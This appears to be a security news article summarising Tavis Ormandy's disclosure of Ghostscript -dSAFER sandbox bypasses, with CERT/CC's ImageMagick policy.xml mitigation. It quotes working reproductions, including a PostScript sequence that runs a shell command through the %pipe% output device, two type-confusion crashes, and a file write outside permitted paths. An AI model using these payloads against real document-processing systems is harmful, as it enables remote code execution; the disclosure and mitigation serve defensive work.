Vulnerabilities in Ghostscript can lead to remote code execution

by ·

Ghostscript is an interpreted language for Adobe PostScript and PDF and is currently used in a variety of applications (eg ImageMagick, Evince, GIMP, PDF Reader, etc.). Recently, Google Project Zero security researcher Tavis Ormandy announced details of the newly discovered Ghostscript vulnerability.
The vulnerability finder has also found high-risk vulnerabilities in Ghostscript. Last year, he discovered that CVE-2017-8291 has been exploited by hackers to attack cryptocurrency trading platforms. This is the first Ghostscript high-risk vulnerability he discovered this year.
The following is a brief introduction to the vulnerability:

1. /invalidaccess checks stop working after a failed restore, so you can just execute shell commands if you handle the error. Exploitation is very trivial. Repro:

$ gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null
GS>legal
GS>{ null restore } stopped { pop } if
GS>legal
GS>mark /OutputFile (%pipe%id) currentdevice putdeviceprops
GS<1>showpage
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

2. setcolor claims no operand checking is necessary, because it’s hidden behind a pseudo-operator of the same name. That’s true, but you can still call it indirectly via setpattern, so type checking is necessary. Repro:

$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /Whatever 16#414141414141 >> setpattern
Segmentation fault

3. The LockDistillerParams boolean isn’t type checked, so nice easy type confusion. Repro:

$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams
Segmentation fault

4. .tempfile permissions don’t seem to work, I don’t know when they broke. You’re not supposed to be able to open files outside of the patterns in the PermitFileReading array, but that doesn’t seem to work for me e.g.:
$ strace -fefile gs -sDEVICE=ppmraw -dSAFER

GS>(/proc/self/cwd/hello) (w) .tempfile
open(“/proc/self/cwd/hello26E8LQ”, O_RDWR|O_CREAT|O_EXCL, 0600) = 3
GS<2>dup
GS<3>(hello) writestring
GS<2>closefile

CERT/CC issued a security advisory to alert the vulnerability that the vulnerability was described as “-dSAFER sandbox bypass vulnerability” and the temporary solution was to disable PostScript, EPS, PDF, and XPS decoders in ImageMagick policy.xml.
<policy domain="coder" rights="none" pattern="PS" />
<policy domain="coder" rights="none" pattern="EPS" />
<policy domain="coder" rights="none" pattern="PDF" />
<policy domain="coder" rights="none" pattern="XPS" />
Currently, Artifex Software, ImageMagick, Redhat, Ubuntu are vulnerable to this vulnerability, CoreOS announced that it is not affected.

Tags: